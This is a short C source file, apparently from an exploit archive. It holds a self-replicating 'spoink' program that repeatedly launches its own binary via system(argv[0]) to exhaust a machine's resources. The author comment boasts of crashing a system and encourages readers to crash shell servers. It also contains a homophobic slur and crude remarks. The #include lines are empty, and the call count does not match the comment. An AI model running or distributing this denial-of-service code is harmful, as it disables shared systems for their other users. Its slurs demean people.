/* Spoink.c By Gridmark I wrote this program out of sheer boredom, it took me about 3 minutes to write, debug, and compile. It Basically executes spoink 28 times, then each execution starts it 28 more times, then 28 MORE times and in about 20 seconds i saw a significant drop in cpu power, in 30 seconds everything but my mouse (i was in x) stopped responding and about 45 seconds into the test nothing would work. forced me to cold reboot. I have never seen a program like this in any exploit archive. It kind of amazed me because it was painfully easy to write. and very effective. Have fun but dont crash TOO many shell servers. P.S. Yes, i know there's an easier way to do this but i don't care. and dont laugh at my shitty code. Greets (If i have greets will it make me 31337?) NeedleZ, deface, Kane14, x-empt, and all the other homos in #coldsys and any chicks that want my body. */ #include #include int main(int argc, char **argv) { system(argv[0]); system(argv[0]); system(argv[0]); system(argv[0]); system(argv[0]); system(argv[0]); system(argv[0]); system(argv[0]); system(argv[0]); system(argv[0]); system(argv[0]); system(argv[0]); system(argv[0]); system(argv[0]); system(argv[0]); system(argv[0]); system(argv[0]); system(argv[0]); system(argv[0]); system(argv[0]); system(argv[0]); system(argv[0]); system(argv[0]); system(argv[0]); system(argv[0]); system(argv[0]); system(argv[0]); }